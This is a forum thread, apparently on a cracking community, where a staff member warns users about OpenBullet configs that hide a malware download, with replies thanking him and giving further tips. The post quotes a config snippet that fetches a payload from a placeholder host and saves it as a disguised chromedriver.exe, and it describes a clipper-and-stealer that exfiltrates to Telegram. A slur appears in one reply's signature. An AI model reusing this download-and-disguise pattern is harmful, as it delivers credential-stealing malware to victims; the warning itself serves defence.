Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 261634

Beware of malicious/infected configs

by Liars - 23 June, 2020 - 10:18 AM
This post is by a banned member (Liars) - Unhide
Liars  
Staff
18.929
Posts
130
Threads
Staff Team
5 Years of service
#1
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.

At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.
[Image: Banner.gif]
 
AD by  @GoodEatsB4U exp 8/12/2024
 
 
[Image: 3KRc17x.gif]
 
Ad by @Bears - expiring 04-01-2025

FOR SALE CONTACT ME VIA DM OR WHISPER

https://spyderproxy.com & https://wehost.gg/ are the best proxies & hosting providere

Ad by @- expiring 11/17/2024
This post is by a banned member (BlocksBet) - Unhide
This post is by a banned member (pixed) - Unhide
pixed  
Heaven
1.609
Posts
509
Threads
4 Years of service
#3
thanks for alerting ::

-----
 
This post is by a banned member (zfn) - Unhide
zfn  
Supreme
1.034
Posts
46
Threads
6 Years of service
#4
Don't download configs from random ass people too.

^^^

[Image: ie73ve.png]

If all the requests before go to one url, and then at the very end there is some random, delete it and see if the config still works SadNigga
 
"Everyone want's to say the n-word, but nobody want's to be black"
 
 
 
 
[Image: iw8SvCG.gif]
This post is by a banned member (shady) - Unhide
shady  
Heaven
3.503
Posts
1.496
Threads
4 Years of service
#5
thanks for the heads up
 
[Image: Final_1.gif]
19k+ Sales - 5+ Years - LifeTime Warranty |List of  Products: https://rentry.co/1s1dstore
This post is by a banned member (jorge_Sz1982) - Unhide
81
Posts
19
Threads
4 Years of service
#6
thanks for info .
for all.        
This post is by a banned member (PhantomHQ) - Unhide
PhantomHQ  
Supreme
1.144
Posts
108
Threads
5 Years of service
#7
(This post was last modified: 23 June, 2020 - 02:49 PM by PhantomHQ.)
LOL what kind of scumbag does that? keeksad
Boyz that's why you should buy config from trusted seller :pepo:
Old discord got termed again, new discord: phantom.1337
[Image: phantom-sig.gif]
Old discord got termed again, new discord: phantom.1337
This post is by a banned member (arminmalek) - Unhide
190
Posts
15
Threads
5 Years of service
#8
Just make it your self it's easy AF pepeokay

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 27 Guest(s)